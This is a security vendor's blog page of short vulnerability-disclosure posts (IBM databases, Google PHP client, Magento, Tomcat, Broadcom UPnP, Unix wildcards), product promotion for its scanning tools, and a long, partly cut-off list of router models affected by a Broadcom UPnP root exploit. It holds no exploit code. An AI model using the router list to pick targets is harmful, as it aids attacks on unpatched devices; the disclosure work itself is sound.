<b>DefenseCode Security Blog</b><br />
<br />
<b>Application Security Testing (the Wild West perspective)</b><br />
Posted 2018-04-23 by Anonymous<br />
<br />
Imagine running a bank in a small town. A small town in the Old Wild West. Gangs roam freely. Many people are poor and desperate. Law and law enforcement exist, but are open to individual interpretation. Many crimes go unpunished. And you keep all the bank's money in the safe. Every night you try to sleep and not think about your safe - is someone trying to pry or blow it open at this very moment?<br />
<br />
Now... imagine you want to make that safe more secure. Would you pay a bunch of thugs to crack it open by force and blow it up? Or would you prefer to pay a group of highly skilled engineers to disassemble it to pieces, carefully examine each one, and explain how to fix all the weaknesses they find?<br />
<br />
The Internet of today still functions much like the old Wild West - many laws that try to enforce order are either too broad or vary significantly from country to country. There are not many law enforcement officials to be found. And a lot of people roam around trying to make a profit even if it means breaking the law.<br />
<br />
Your applications and infrastructure are your safe. At least they should be secure. You cannot be sure unless someone examines them thoroughly and helps you find and fix the vulnerabilities before the bad guys do. Examining a running application is called <a href="http://defensecode.com/webscanner.php">DAST (Dynamic Application Security Testing)</a>. DAST is the equivalent of roughly shaking the safe, beating it with a large club, cutting it with a blowtorch, and finishing up with a bunch of explosives. It has its own purpose and advantages, but it will never discover some of the weaknesses that careful disassembly and examination would. To check your applications thoroughly you need to analyze their source code. The best method to do this is called <a href="http://defensecode.com/thunderscan.php">SAST (Static Application Security Testing)</a>.<br />
<br />
To perform the static testing, you can employ two methods:<br />
<br />
<ol>
<li>Team(s) of highly skilled security professionals going through your source code line by line and trying to spot weaknesses</li>
<li>Find some way to automate the procedure and have people only examine and verify the results</li>
</ol>
<br />
<br />
The first method (manual code review) gives the best results if the team is skilled enough and has enough time. Experienced security professionals are hard to find (read: not cheap), and manually going through even a medium-sized application can take a whole team many months or years. Because of the huge cost and the time it takes, manual code review is seldom employed for anything but applications of the utmost importance.<br />
<br />
The way to go is to automate the procedure and employ your own computer to read and understand the source code, and to notify you if there are any security vulnerabilities in there. That way you can check your code while still in the early stages of development and spot issues early enough to avoid the cost of a major redesign later on. With automated tools you can make a policy that says: "Every new version of the application that goes into production must go through a security review". That way you can sleep peacefully knowing that the latest deploy did not just open up a huge hole right in the middle of your application - a hole you might hear about in the morning news while sipping your coffee. Probably not the way you want to make a debut for yourself and your company.<br />
<br />
The question remains - if source code review is so costly and time-consuming, how can anyone afford to do it even once, let alone run regular checks every time something is changed or added? There are not many solutions and tools that help you, but we can assure you ours is one of the best there is. We call it <a href="http://defensecode.com/thunderscan.php">ThunderScan</a>. Almost 10 years in development, it has grown to become one of the best and most cost-effective tools out there. Maybe even the best - we will let you decide.<br />
<br />
We tried to find a way to compare it to the best tools there are. The most objective and acclaimed way to do it was to apply for the <a href="https://www.owasp.org/index.php/Benchmark">OWASP Benchmark Project</a>. The OWASP Foundation is one of the top authorities in IT security. Their Benchmark allowed us to compare the score of our SAST tool (<a href="http://defensecode.com/thunderscan.php">ThunderScan</a>) to the best tools in the world. And our results were impressive - we managed to find <a href="http://defensecode.com/news_article.php?id=29">way more vulnerabilities than any other commercial tool</a>.<br />
<br />
We encourage you to try our tool yourself and form your own opinion. You can grab a free trial by clicking <a href="https://www.defensecode.com/contact.php?subject=3&item=ThunderScan">HERE</a>. No credit card required. Really free of charge. Let us know how you like it by contacting us at <a href="mailto:defensecode@defensecode.com">defensecode@defensecode.com</a>.<br />
<br />
Kind regards,<br />
<br />
DefenseCode team<br />
<br />
P.S.<br />
We mentioned we also excel in cost-performance. Well... that was not the whole truth. Although we offer the highest quality, we do not charge the highest prices. On the contrary - our prices are only a fraction of the prices of other top-of-the-line tools, and we are so proud of it that we made them public. You can check them out <a href="https://www.defensecode.com/pricing-products.php#thunder">HERE</a>.<br />
<b>Multiple Buffer Overflow Vulnerabilities in IBM Database software (DB2 and Informix)</b><br />
Posted 2017-07-11 by DefenseCode<br />
Hi Dear Reader,<br />
<br />
During the last couple of weeks we have published security vulnerabilities in database tools related to the DB2 and Informix databases.<br />
We're sure that you (as a responsible database admin) usually don't run arbitrary "attacker-supplied" .SQL files on your database.<br />
But after the security audit of the Informix and DB2 database tools, we're sure you will want to take extra care on that one, since we have discovered that malicious .SQL files can overflow the database tools' memory buffers and execute arbitrary code on your system.<br />
<br />
Links to our advisories follow...<br />
<br />
Informix Security Advisory:<br />
<a href="http://www.defensecode.com/advisories/DC-2017-04-001_IBM_Informix_DB-Access_Buffer_Overflow.pdf">http://www.defensecode.com/advisories/DC-2017-04-001_IBM_Informix_DB-Access_Buffer_Overflow.pdf</a><br />
<br />
DB2 Security Advisory:<br />
<a href="http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf">http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf</a><br />
<br />
Kind Regards,<br />
DefenseCode Team<br />
<br />
<b>ThunderScan Discovered Multiple Vulnerabilities in Google API Client Library for PHP</b><br />
Posted 2017-06-06 by DefenseCode<br />
Hi,<br />
<br />
During a security audit of the Google APIs Client Library for PHP, multiple XSS vulnerabilities were discovered using the DefenseCode ThunderScan SAST application source code security analysis platform. The Google API Client Library for PHP is designed for PHP client-application developers. It offers simple, flexible, powerful access to many Google APIs such as Google+, Drive, or YouTube.<br />
<br />
A Cross-Site Scripting vulnerability enables an attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code is executed with unrestricted access to the site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email or posting it as part of a comment on the vulnerable site or another forum. Once the unsuspecting user has visited such a URL, the attacker can proceed to send requests to the API on behalf of the victim from their JavaScript.<br />
<br />
The full advisory can be read at the following URL: <a href="http://www.defensecode.com/advisories/DC-2017-04-012_google-api-php-client_Advisory.pdf">http://www.defensecode.com/advisories/DC-2017-04-012_google-api-php-client_Advisory.pdf</a><br />
<br />
Regards,<br />
DefenseCode Team<br />
<br />
<b>DefenseCode Is Looking for New Partners and Resellers</b><br />
Posted 2017-06-06 by DefenseCode<br />
In order to further expand its rapid growth, DefenseCode L.L.C. is currently looking to expand its worldwide network of partners and resellers for its software products and services. If you are interested in a partnership with DefenseCode L.L.C. for distribution of world-class security solutions for Web Security Scanning and Static Source Code Security Analysis, as well as our security consulting services, we would be glad to hear from you.<br />
<br />
Potential partners and resellers are encouraged to contact us by e-mail at <b>partners@defensecode.com</b>. We are looking forward to new partners and more exciting business opportunities.<br />
<br />
Regards,<br />
DefenseCode Team<br />
<br />
<b>Stealing Windows Credentials Using Google Chrome</b><br />
Posted 2017-06-06 by DefenseCode<br />
Hi,<br />
<br />
Check out our new whitepaper about stealing Windows credentials using the most popular browser today - Google Chrome.<br />
<br />
URL:<br />
<a href="http://www.defensecode.com/news_article.php?id=21">http://www.defensecode.com/news_article.php?id=21</a><br />
<br />
<br />
Regards,<br />
DefenseCode Team<br />
<br />
<b>High Risk 0-day Vulnerability Found in Magento eCommerce</b><br />
Posted 2017-04-12 by Bosko<br />
<div class="body">
During the security audit of Magento Community Edition, a highly
popular e-commerce platform, a high risk vulnerability was discovered
that could lead to remote code execution and thus complete system
compromise, including the database containing sensitive customer
information such as stored credit card numbers and other payment
information. The vulnerability is based around an arbitrary file upload
combined with a cross-site request forgery (CSRF) vulnerability as the
main attack vector.<br />
<br />
Despite the efforts of our team in notifying the vendor on more than
one occasion since November 2016, the vulnerability remains unpatched.<br />
<br />
Full vulnerability details are published as an <a href="http://www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf">advisory</a>.<br />
<br />
Regards,<br />
DefenseCode Team</div>
<b>Apache Tomcat Vulnerabilities Found Using DefenseCode ThunderScan SAST</b><br />
Posted 2017-04-10 by DefenseCode<br />
<div>
During the source code security analysis of <a href="https://en.wikipedia.org/wiki/Apache_Tomcat">Apache Tomcat</a> with the <a href="http://defensecode.com/thunderscan.php">DefenseCode ThunderScan</a> SAST solution, two different security issues were discovered, ranked as medium risk.<br />
When exploited, the discovered vulnerabilities can be abused to disclose and retrieve arbitrary files on the server, such as the Apache Tomcat configuration file with plain-text usernames and passwords, or any other file which Apache Tomcat has permission to access.</div>
<div>
Full vulnerability details are published as an <a href="http://defensecode.com/advisories/DC-2017-03-001_DefenseCode_ThunderScan_SAST_Apache_Tomcat_Security_Advisory.pdf">advisory</a> and include ThunderScan screenshots for a better understanding of the vulnerabilities.</div>
<div>
Regards,</div>
<div>
DefenseCode Team</div>
<b>BroadCom UPnP Format String Preauth Root Exploit Aftermath (Few Years Later)</b><br />
Posted 2017-04-06 by DefenseCode<br />
<pre wrap="">Hi,
A few years ago, we discovered a remotely exploitable preauth Format
String vulnerability in the Broadcom UPnP implementation used in popular
routers.
Vendors were notified and an advisory was published -
<a href="http://defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf">http://defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf</a> .
Broadcom fixed the vulnerability in their UPnP implementation and some
router vendors did so as well.
The vulnerability was initially discovered on Cisco Linksys (now Belkin)
WRT54GL routers, but as stated before, the vulnerable UPnP implementation
was used by many vendors.
Back in the day, Cisco fixed the vulnerability, but we are not sure
about all the other router vendors and models because there are too many of
them.
When we initially discovered the vulnerability, Rapid7 also discovered
various overflows in other popular UPnP implementations and published a
paper about it.
Rapid7 document about the vulnerabilities they discovered in UPnP
implementations: <a href="https://community.rapid7.com/docs/DOC-2150">https://community.rapid7.com/docs/DOC-2150</a>
When they did their research, there were approx. 15 million devices with
the vulnerable Broadcom UPnP implementation discovered on the Internet,
and probably many more on intranets.
We wrote a paper with detailed exploitation steps for the now-fixed
Broadcom UPnP Format String vulnerability, but never published it due to
the severity of the bug.
Now, a few years later, we feel comfortable releasing the full research
paper with vulnerability details and exploitation steps for the discovered
Format String vulnerability.
The big issue with routers is that users rarely update them with new
firmware, so there could still be a lot of vulnerable routers on the
Internet and on intranets.
The full research paper on the discovery and exploitation of the Broadcom UPnP
Format String vulnerability can be found at the following link:
<a href="http://www.defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt">http://www.defensecode.com/whitepapers/From_Zero_To_ZeroDay_Network_Devices_Exploitation.txt</a>
Since Broadcom and the vendors that use their chipsets have shipped fixed versions of the UPnP implementation for some time now, the vulnerability has not been a 0day for some time.
Still, we are sure there are plenty of unpatched routers out there.
</pre>
<pre wrap="">Regards,</pre>
<pre wrap="">DefenseCode Team</pre>
<b>Brand New ThunderScan and Web Security Scanner</b><br />
Posted 2017-03-21 by DefenseCode<br />
Hello,<br />
<br />
It's been a while since our last post.<br />
We have been working hard on improving our flagship products - the ThunderScan Source Code Security Analyzer SAST solution and the Web Security Scanner DAST solution.<br />
We are pleased to say that brand new versions of both products are ready for use.<br />
Check out our website for more details: <a href="http://www.defensecode.com/">http://www.defensecode.com/</a>.<br />
<br />
Regards,<br />
Leon Juranic<br />
<br />
<b>Back To The Future: Unix Wildcards Gone Wild</b><br />
Posted 2014-06-25 by DefenseCode<br />
Hi,<br />
<br />
We wanted to inform all major *nix distributions about this problem via our responsible disclosure policy before posting it, because it is highly likely that this problem could lead to local root access on many distributions. But since part of the research contained in the document was mentioned in some blog entries, we are forced to release it in its full version.<br />
<br />
Download URL:<br />
<a href="http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt">http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt</a><br />
<br />
Regards,<br />
Leon Juranic<br />
<br />
<b>First public patch for Broadcom UPnP vulnerability</b><br />
Posted 2013-02-06 by DefenseCode<br />
First public patch for Broadcom UPnP vulnerability from TP-Link.<br />
<br />
From: <a href="http://forum.tp-link.com/showthread.php?2252-Fixed-a-critical-vulnerability-issue-related-to-UPnP">http://forum.tp-link.com/showthread.php?2252-Fixed-a-critical-vulnerability-issue-related-to-UPnP</a><br />
<br />
<blockquote class="tr_bq">
Fixed a critical vulnerability issue related to UPnP<br />
Model : TD-W8960N<br />
Hardware Version : V4<br />
Following the release this week of a research paper from security firm Rapid7 describing vulnerabilities in the widely used Intel/Portable UPnP SDK and MiniUPnP SDK stacks, security researchers from DefenseCode announced that they identified a critical vulnerability in a separate UPnP stack developed by Broadcom and used in devices with Broadcom chipsets, including one device from TP-LINK, the TD-W8960N.<br />
http://www.defensecode.com/public/De...y_Advisory.pdf<br />
Being aware of the urgency of this issue, our R&D solved it immediately and released a beta Firmware for the customers who are worried about this problem to download.<br />
You can find this beta Firmware here:<br />
http://www.tp-link.com/en/support/do...rsion=V4#tbl_j<br />
At the end of February, we will release the official FW, solving the UPnP Vulnerability of TD-W8960N.</blockquote>
<br />
<br />
Regards,<br />
DefenseCode<br />
<br />
<b>DefenseCode Security Advisory: Cisco Linksys Remote Preauth 0day Root Exploit Follow-Up</b><br />
Posted 2013-02-06<br />
<br />
A few weeks ago, we announced a remote preauth root access exploit for<br />
Cisco Linksys (<a href="http://www.youtube.com/watch?v=cv-MbL7KFKE">http://www.youtube.com/watch?v=cv-MbL7KFKE</a>).<br />
<br />
Vulnerability details were disclosed here:<br />
<a href="http://www.defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf">http://www.defensecode.com/public/DefenseCode_Broadcom_Security_Advisory.pdf</a><br />
<br />
During further research, we discovered that other router<br />
manufacturers are also affected by the same vulnerability, since the<br />
vulnerable Broadcom UPnP stack is used across multiple router vendors.<br />
<br />
According to data from Rapid7, of the 80 million routers discovered<br />
during data gathering on the Internet, ~15 million had Broadcom UPnP.<br />
More info available here:<br />
<a href="http://information.rapid7.com/upnp-webcast-video-page.html">http://information.rapid7.com/upnp-webcast-video-page.html</a><br />
<br />
Below is a partial list of other vulnerable router manufacturers and<br />
models. Thanks to HD Moore of Rapid7 for the data.<br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
DefenseCode<br />
http://www.defensecode.com/<br />
<br />
<br />
<br />
3Com<br />
<br />
- ADSL Wireless Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Actiontec<br />
<br />
- GT784WN<br />
<br />
- xDSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
- DSL Modem implementing Qwest TR-064 v1.0 specification<br />
<br />
- DSL Modem implementing TR-064 v1.0 specification<br />
<br />
<br />
<br />
Actiontec Electronics<br />
<br />
- Actiontec xDSL Router<br />
<br />
- Verizon ADSL Router<br />
<br />
<br />
<br />
ADBB<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
ADB Broadband<br />
<br />
- ADB ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ADB Broadband S.p.A.<br />
<br />
- ADB ADSL Router<br />
<br />
<br />
<br />
ADB Broadband S.p.A<br />
<br />
- HomeStation ADSL Router<br />
<br />
<br />
<br />
<br />
ADSL2+ Router <br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSLRouter<br />
<br />
<br />
<br />
ALBIS<br />
<br />
- Router VLR-4300-I<br />
<br />
<br />
<br />
Allied Telesis K.K.<br />
<br />
- CG-BARFX3<br />
<br />
<br />
<br />
Alpha<br />
<br />
- ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- Sky ADSL Router<br />
<br />
<br />
<br />
Alvarion<br />
<br />
- Residential Gateway<br />
<br />
<br />
<br />
ASB<br />
<br />
- ADSL Router<br />
<br />
- Alcatel-EG692HW Internet Sharing Gateway<br />
<br />
- ChinaTelecom E8C(EPON) Gateway<br />
<br />
- Home Gateway<br />
<br />
<br />
<br />
Askey<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Askey Computer Corp.<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
ASUS<br />
<br />
- Wireless Router<br />
<br />
<br />
<br />
ASUSTek<br />
<br />
- ASUS ADSL Router<br />
<br />
- ASUS Wireless Harddisk Drive<br />
<br />
- ASUS Wireless Router<br />
<br />
<br />
<br />
ASUSTek Computer Inc.<br />
<br />
- ASUS Wireless Router<br />
<br />
- Residential Gateway Device<br />
<br />
- WL-500gPV2<br />
<br />
- WL-500gP V2<br />
<br />
- WL-520GU<br />
<br />
- WL700gE<br />
<br />
<br />
<br />
BEC_8800N<br />
<br />
- BEC 8800N<br />
<br />
<br />
<br />
BEC Technologies Inc.<br />
<br />
- BEC 7800TN R2<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Belkin<br />
<br />
- ADSL Router<br />
<br />
- F5D8232-4 v1000<br />
<br />
- N1 ADSL Router<br />
<br />
- Wireless ADSL Router<br />
<br />
- BoB<br />
<br />
- iiNet BoB<br />
<br />
- Wireless ADSL Router<br />
<br />
<br />
<br />
Bellmann<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Billion<br />
<br />
- BiPAC 7700N<br />
<br />
- BiPAC 7700N R2<br />
<br />
<br />
<br />
Billion Electric Co., Ltd.<br />
<br />
- ADSL2+ Firewall Router<br />
<br />
- BiPAC 7800VDOX<br />
<br />
- BiPAC 7800VDPX<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
Billion Electric Co.,Ltd.<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
Billion Electric Co, PC Range Pty Ltd.<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
BM<br />
<br />
- ChinaTelecom E8C(EPON) Gateway<br />
<br />
<br />
<br />
Broadcom<br />
<br />
- 3G Router<br />
<br />
- Actiontec GT784WN<br />
<br />
- Actiontec xDSL Router<br />
<br />
- ADSL2+ 11n WiFi CPE<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- ChinaTelecom E8 ADSL Router<br />
<br />
- D-link ADSL Router<br />
<br />
- D-Link ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- D-Link DSL-2640B<br />
<br />
- D-Link DSL-2641B<br />
<br />
- D-Link DSL-500B<br />
<br />
- DSL2740B ADSL Router<br />
<br />
- DSL Router<br />
<br />
- HomeStation ADSL Router<br />
<br />
- PHILEAS-WORLD<br />
<br />
- PTCL ADSL Router<br />
<br />
- Residential Gateway Device<br />
<br />
- SemIndia Systems ADSL2Plus Router<br />
<br />
- STOREX<br />
<br />
- WL700g<br />
<br />
- Zoom ADSL Router<br />
<br />
<br />
<br />
BT<br />
<br />
- Voyager 2091<br />
<br />
- Voyager 220V<br />
<br />
- Voyager 2091<br />
<br />
- Voyager 2110<br />
<br />
- Voyager 220V<br />
<br />
- Voyager 2500V<br />
<br />
<br />
<br />
Careca<br />
<br />
- HRDSL108W 108M Wireless ADSL2+ router<br />
<br />
<br />
<br />
CATCH-TEC<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
CDC POINT S.P.A<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
ChinaTelecom<br />
<br />
- ASB Home Gateway<br />
<br />
<br />
<br />
China Telecom<br />
<br />
- ChinaNet EPON Router<br />
<br />
- E8C(EPON) Gateway<br />
<br />
- E8C Gateway<br />
<br />
- Navigator 1-2 Gateway<br />
<br />
<br />
<br />
Cisco Systems,Inc.<br />
<br />
- Cisco ADSL Router<br />
<br />
<br />
<br />
ClearAccess<br />
<br />
- Broadcom ADSL Router<br />
<br />
- D-Link DSL-2730B<br />
<br />
<br />
<br />
Comtrend<br />
<br />
- AR-5383n<br />
<br />
- Broadcom ADSL Router<br />
<br />
- single-chip ADSL router<br />
<br />
- WAP-5850g<br />
<br />
- Netcomm ADSL2+/3G Wi-Fi Router<br />
<br />
<br />
<br />
Corega<br />
<br />
- CG-BARMX2<br />
<br />
- CG-WLBARAGM<br />
<br />
<br />
<br />
Danalink<br />
<br />
- Dynalink ADSL Router<br />
<br />
- Dynalink Wireless ADSL2+ Router<br />
<br />
<br />
<br />
DARE<br />
<br />
- DareGlobal Home Gateway<br />
<br />
<br />
<br />
Dare<br />
<br />
- Router<br />
<br />
<br />
<br />
Dare Inc.<br />
<br />
- Dare ADSL2+ Modem/Wireless Router<br />
<br />
<br />
<br />
DCOM<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DGT<br />
<br />
- VDSL Router<br />
<br />
<br />
<br />
Digicom<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Digital Data Communications, Inc<br />
<br />
- FBR-1461A ADSL2+ Modem Router(X.X.X.X)<br />
<br />
- FBR-1461 ADSL2+ Modem Router (X.X.X.X)<br />
<br />
<br />
<br />
DIGITUS<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
DIT<br />
<br />
- Gateway<br />
<br />
<br />
<br />
D-Link<br />
<br />
- ADSL MODEM<br />
<br />
<br />
<br />
D-link<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
D-LINK<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DLink<br />
<br />
- Alpha ADSL Router<br />
<br />
<br />
<br />
D-Link Corporation.<br />
<br />
- D-Link D-LinkDSL-2640B<br />
<br />
- D-Link DSL-2640B<br />
<br />
- D-LinkDSL-2640B<br />
<br />
- D-LinkDSL-2641B<br />
<br />
- D-Link DSL-2740B<br />
<br />
- D-LinkDSL-2740B<br />
<br />
- D-Link DSL-2740U<br />
<br />
- D-Link DSL-2741B<br />
<br />
- D-LinkDSL-2741B<br />
<br />
- D-Link DSL-2750B<br />
<br />
- D-LinkDSL-2750B<br />
<br />
<br />
<br />
D-Link Corporation<br />
<br />
- D-Link DSL6740U<br />
<br />
- DSL-2640B<br />
<br />
- DSL2740B<br />
<br />
- DSL-2740B<br />
<br />
- DSL-2740B Adsl Router<br />
<br />
- DSL-2740B Adsl Router<br />
<br />
- DSL-2740U Adsl Router<br />
<br />
- DSL-2741B<br />
<br />
- DSL-2741B Adsl Router<br />
<br />
- DSL2750B<br />
<br />
- DVA-G3670B Adsl Router<br />
<br />
<br />
<br />
Dlink<br />
<br />
- ADSL router<br />
<br />
- ADSL Router<br />
<br />
- D-Link ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- DLink ADSL Router<br />
<br />
- ADSL Router<br />
<br />
- DSL-2500U<br />
<br />
- DSL-2542B<br />
<br />
- DSL-2640B<br />
<br />
- DSL-2640U<br />
<br />
- DSL-2730B<br />
<br />
- D-Link DSL-2730B<br />
<br />
- DSL2730U<br />
<br />
- DSL-2730U<br />
<br />
- DSL-2740EL<br />
<br />
- DSL2750U<br />
<br />
- DSL-2750U<br />
<br />
- D-Link DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- Router<br />
<br />
- D-Link VDSL Router<br />
<br />
- Wireless Router<br />
<br />
- DSL-2542B<br />
<br />
- DSL-2640B<br />
<br />
- DSL-2640BT<br />
<br />
- DSL-2640U<br />
<br />
- DSL-2740B<br />
<br />
- DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- DSL-526B<br />
<br />
- DVA-G3672B-LTT Networks ADSL Router<br />
<br />
- DVA-G3672B Networks ADSL Router<br />
<br />
<br />
<br />
DQ<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
DQ Technology, Inc.<br />
<br />
- ADSL2+ 11n WiFi CPE<br />
<br />
- ADSL2+ CPE<br />
<br />
- DSL-2542BNetworksADSLRouter<br />
<br />
- DSL-2642BNetworksADSLRouter<br />
<br />
- DSL-2730BNetworksADSLRouter<br />
<br />
- DSL-2730UNetworksADSLRouter<br />
<br />
<br />
<br />
DSL<br />
<br />
- ARouter<br />
<br />
- DSLRouter<br />
<br />
- TW ARouter<br />
<br />
<br />
<br />
Dynalink<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Wireless Modem Router<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
ENKOM<br />
<br />
- AMIS Router<br />
<br />
<br />
<br />
FAMNET<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
FiberHome<br />
<br />
- ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Glitel<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
gmesh<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
huaqin<br />
<br />
- HGU421 Router<br />
<br />
- HGU421 v3 Router<br />
<br />
<br />
<br />
Huawei-3Com<br />
<br />
- BR204+<br />
<br />
<br />
<br />
Huawei<br />
<br />
- Echolife ADSL Router<br />
<br />
- EchoLife Home Gateway<br />
<br />
- HG227<br />
<br />
- ADSL Router<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Huawei Technologies Co., Ltd<br />
<br />
- EchoLife HG520<br />
<br />
<br />
<br />
iBall Baton<br />
<br />
- 150M Wireless-N ADSL2+ Router<br />
<br />
<br />
<br />
iiNet<br />
<br />
- BoB2<br />
<br />
- BoBLite<br />
<br />
<br />
<br />
Innoband<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
Inteno<br />
<br />
- Broadcom ADSL Router<br />
<br />
- DSL Router<br />
<br />
- Residential Gateway<br />
<br />
<br />
<br />
Intercross<br />
<br />
- Broadcom ADSL Router<br />
<br />
- InternetGatewayDevice<br />
<br />
<br />
<br />
IskraTEL<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ITI Ltd.<br />
<br />
- ITI ADSL2+ Modem/Wireless Router<br />
<br />
- ITI Ltd.ADSL2Plus Modem/Router<br />
<br />
<br />
<br />
KÖNIG<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
Kunhar Peripherals Pvt Ltd<br />
<br />
- 54M Wireless ADSL2+ router<br />
<br />
<br />
<br />
LevelOne<br />
<br />
- FBR-1461B<br />
<br />
<br />
<br />
Linksys by Cisco<br />
<br />
- Linksys WRT54G<br />
<br />
- Linksys WRT54GL<br />
<br />
<br />
<br />
Linksys Inc.<br />
<br />
- DD-WRT Router (X.X.X.X)<br />
<br />
- Linksys MA568243<br />
<br />
- Linksys ma890673<br />
<br />
- Linksys WRT150N<br />
<br />
- Linksys WRT54GL<br />
<br />
- Linksys WRT54GS-PC<br />
<br />
- Linksys wrt54gs v4<br />
<br />
- Linksys WRT54GS (X.X.X.X)<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Linksys<br />
<br />
- Internet Gateway Device<br />
<br />
- Wireless Router<br />
<br />
<br />
<br />
MAXON<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
MEDIACOM Wireless-N ADSL2+ Router<br />
<br />
MEDIACOM Wireless-N ADSL2+ Router - ADSL2+ Router<br />
<br />
<br />
<br />
Micronet Communications Inc.<br />
<br />
- Micronet WLAN ADSL2+ Modem Router<br />
<br />
<br />
<br />
Micro-Star International<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Minitar Corporation<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
Motorola<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
NB<br />
<br />
- DSL-2740B<br />
<br />
<br />
<br />
NetComm<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
NetComm Limited<br />
<br />
- NetComm ADSL2+ Router<br />
<br />
- NetComm ADSL2+ Wireless Router<br />
<br />
- 11n Wireless ADSL2+ Router<br />
<br />
- 11n Wireless ADSL Router<br />
<br />
- Netcomm ADSL2+/3G Wi-Fi Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Wireless Router<br />
<br />
- NB6 ADSL2+ Router<br />
<br />
- NB6Plus4W ADSL2+ Wireless Modem Router<br />
<br />
- NB6PLUS4W Wireless ADSL2+ Router<br />
<br />
- NB6W Wireless ADSL2+ Router<br />
<br />
- WiFi Data and VoIP Gateway<br />
<br />
<br />
<br />
NetComm Wireless Limited<br />
<br />
- NetComm ADSL2+ Router<br />
<br />
- NetComm ADSL2+ Wireless Router<br />
<br />
<br />
<br />
Netgear<br />
<br />
- Broadcom ADSL Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL Router<br />
<br />
- RP614v4<br />
<br />
<br />
<br />
Neuf Telecom<br />
<br />
- Trio4<br />
<br />
<br />
<br />
NewMedia-NET GmbH<br />
<br />
- DD-WRT Router (X.X.X.X)<br />
<br />
<br />
<br />
OPTICOM<br />
<br />
- DSLink 279<br />
<br />
<br />
<br />
Orcon<br />
<br />
- Genius<br />
<br />
- GeniusLite<br />
<br />
- Orcon<br />
<br />
- P-660HN-51<br />
<br />
<br />
<br />
PENTAGRAM<br />
<br />
- home.gateway<br />
<br />
<br />
<br />
PhoebeMicro<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Pirelli<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Pirelli Broadband Solutions<br />
<br />
- HomeStation ADSL Router<br />
<br />
<br />
<br />
PLANET<br />
<br />
- ADN-4000<br />
<br />
<br />
<br />
Planex<br />
<br />
- BLW-54CW<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
QTECH<br />
<br />
-<br />
<br />
- Broadcom ADSL Router<br />
<br />
- QTECH<br />
<br />
- Residential Gateway<br />
<br />
- ResidentialGatewayDevice<br />
<br />
<br />
<br />
ROTAL<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
<br />
<br />
Router<br />
<br />
- ADSL Router<br />
<br />
- Router<br />
<br />
<br />
<br />
Sagem<br />
<br />
- AFAQ DSL SHAMEL ROUTER<br />
<br />
<br />
<br />
Sagemcom<br />
<br />
- ADSL Router<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
SemIndia Systems Private Ltd.<br />
<br />
- SemIndia ADSL2Plus Modem/Router<br />
<br />
<br />
<br />
SemIndia Systems Pvt. Ltd.<br />
<br />
- SemIndia Systems ADSL2Plus Modem Router<br />
<br />
- SemIndia Systems ADSL2Plus Modem/Wireless Router<br />
<br />
<br />
<br />
